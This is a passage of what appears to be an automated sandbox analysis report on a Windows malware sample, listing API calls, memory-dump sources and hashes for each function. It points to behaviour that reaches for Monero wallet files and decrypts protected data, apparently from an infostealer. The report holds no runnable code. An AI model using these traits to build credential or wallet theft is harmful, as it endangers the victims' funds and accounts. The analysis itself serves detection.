                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 297aaaee700b41391b206842952f2f08235e3348e2dc04da71af531786a11c03
                              • Instruction ID: 5edd0bcf4c2ba24a3b439fa6b2ff6cde1557bcfcf3422b6156e2fdee749e051b
                              • Opcode Fuzzy Hash: 297aaaee700b41391b206842952f2f08235e3348e2dc04da71af531786a11c03
                              • Instruction Fuzzy Hash: DF410AB194011CABDB28DB54DC99BFDB3B4EB44700F2041D9E60967191DB742F89CFA1
                              Function 00BEE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C00D73), ref: 00BEE4A2
                              • StrCmpCA.SHLWAPI(?,00C014F8), ref: 00BEE4F2
                              • StrCmpCA.SHLWAPI(?,00C014FC), ref: 00BEE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 781dc9e4b5ae1d17775064d2dec5dc06213594188be40d75e7a8ffc3651ae5e3
                              • Instruction ID: e5282ca2a26bb06248ff7717e751b3e43e4e8919800bb839c40c4a24b1370731
                              • Opcode Fuzzy Hash: 781dc9e4b5ae1d17775064d2dec5dc06213594188be40d75e7a8ffc3651ae5e3
                              • Instruction Fuzzy Hash: 5312FBB191011C9ADB18FB64DC96EFD73B8AB54340F4085E9A60EA7091EF706F4DCB92
                              Function 00BEC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BEC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BEC87C
                              • lstrcat.KERNEL32(?,00C00B46), ref: 00BEC943
                              • lstrcat.KERNEL32(?,00C00B47), ref: 00BEC957
                              • lstrcat.KERNEL32(?,00C00B4E), ref: 00BEC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 6c5ff3aba035736508cd16bcddf761cdc43d929a6e3651a4899024fef27b5a96
                              • Instruction ID: baa4d79ae7774e9e6c87f0fde5026cc49c6eeca57f3fda93ad0b3a099116781a
                              • Opcode Fuzzy Hash: 6c5ff3aba035736508cd16bcddf761cdc43d929a6e3651a4899024fef27b5a96
                              • Instruction Fuzzy Hash: 9B4160B990421ADFCB20DFA4DD89BFEBBB8BB44304F1441B8E509A7281D7705A85CF91
                              Function 00FAB061 Relevance: 7.6, Strings: 5, Instructions: 1308COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Zqw$1|?n$_e'$#~$y]?
                              • API String ID: 0-507574501
                              • Opcode ID: 6e38fd7e27e7c4597ba687700ee4eb7c805054c4e71b3bc903075ffa6d747294
                              • Instruction ID: 648eed16c5c2335b620cf7d461bd670672ec819efe0a23cb2ebb8d608b797d06
                              • Opcode Fuzzy Hash: 6e38fd7e27e7c4597ba687700ee4eb7c805054c4e71b3bc903075ffa6d747294
                              • Instruction Fuzzy Hash: B09219F390C2009FE304AE29EC8567AB7E9EF94720F16893DEAC4D7744EA7558018797
                              Function 00BE7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BE724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BE7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BE72A4
                              • LocalFree.KERNEL32(?), ref: 00BE72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: e92c36e31904e8b7d8bccb605ad26f9ac84542916c9df9d24548274aebf1d356
                              • Instruction ID: 23adcd354e353b29a62acc4e137bc10e76f783875a7e839e2274335370561ef2
                              • Opcode Fuzzy Hash: e92c36e31904e8b7d8bccb605ad26f9ac84542916c9df9d24548274aebf1d356
                              • Instruction Fuzzy Hash: 8F0100B5A40208BFDB24DBD5DD4AF9D77B8EB44700F144155FB05BA2C0DBB0AA058B65
                              Function 00BF9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BF961E
                              • Process32First.KERNEL32(00C00ACA,00000128), ref: 00BF9632
                              • Process32Next.KERNEL32(00C00ACA,00000128), ref: 00BF9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00BF965C
                              • CloseHandle.KERNEL32(00C00ACA), ref: 00BF967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 6858b816f69b9d8ab0552f5ee45eef92fa0c1c7b6f73b7c7d49702635cfaf008
                              • Instruction ID: fa70b9869641818f0e0350bde286080e6ae36d47a916c1fe52181881b0f655ea
                              • Opcode Fuzzy Hash: 6858b816f69b9d8ab0552f5ee45eef92fa0c1c7b6f73b7c7d49702635cfaf008
                              • Instruction Fuzzy Hash: 0201E975A00208AFCB24DFA5C988BEDB7F8EB48300F144199AA05E7240DB749A49CF51
                              Function 00FB88C1 Relevance: 7.4, Strings: 5, Instructions: 1198COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _;E$d1yg$dH:k$tuz$"oY
                              • API String ID: 0-1707974270
                              • Opcode ID: 32f3c0ad658d01fe933c764d03d438e94d0e4dfc16463bbefca9ccdb783f3396
                              • Instruction ID: ee14d366056b9885f01358298b2e4ceb50f5ca9a3803223341ba0155ea74ee58
                              • Opcode Fuzzy Hash: 32f3c0ad658d01fe933c764d03d438e94d0e4dfc16463bbefca9ccdb783f3396
                              • Instruction Fuzzy Hash: C18205F3A086049FE304AE2DEC8567AFBE5EF94320F16893DEAC4C7744E63558058697
                              Function 00FB6BC6 Relevance: 6.4, Strings: 4, Instructions: 1393COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .}$7L?}$fc{$r|
                              • API String ID: 0-94770799
                              • Opcode ID: c709065842e6e5b28bceaa604b03a546c335c7c958f7f7b2aedbfe82f9d8d9fa
                              • Instruction ID: 7e7d089eaf7552365fa94e72a4ea566c47acc69af4bc6a820f080c654e8310b7
                              • Opcode Fuzzy Hash: c709065842e6e5b28bceaa604b03a546c335c7c958f7f7b2aedbfe82f9d8d9fa
                              • Instruction Fuzzy Hash: 2292F8F3A0C2049FE3046E2DEC4566AFBE5EF94320F1A463DEAC4C7744E63599058697
                              Function 00BF8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C005B7), ref: 00BF86CA
                              • Process32First.KERNEL32(?,00000128), ref: 00BF86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00BF86F3
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • CloseHandle.KERNEL32(?), ref: 00BF8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: cc2501a22999b132fa65c96ddb9d81220084a15873002b936d781036bde432a8
                              • Instruction ID: 2721d3a298d100a99d0000a4da1b83206b107a100b47dde2ceea4bfe1468114a
                              • Opcode Fuzzy Hash: cc2501a22999b132fa65c96ddb9d81220084a15873002b936d781036bde432a8
                              • Instruction Fuzzy Hash: D4310CB190111CABCB28EB55DC45FEEB7B8EB45740F1041E9A60DA71A0DB706E49CFA1
                              Function 00BF8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00BE5184,40000001,00000000,00000000,?,00BE5184), ref: 00BF8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: ab96b1a896bc1c229a0ea465c865443646ad620fd6ae217a484148eab6177b98
                              • Instruction ID: 5fd4cd35aca43cc73379100f870ccbcdea65da1c3c28e93f10346724c7750be4
                              • Opcode Fuzzy Hash: ab96b1a896bc1c229a0ea465c865443646ad620fd6ae217a484148eab6177b98
                              • Instruction Fuzzy Hash: F4110670200208AFDB04CF65D889FBA33E9EF89700F149898FA198B250DB75E849DB60
                              Function 00BE9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9B2A
                              • LocalFree.KERNEL32(?,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
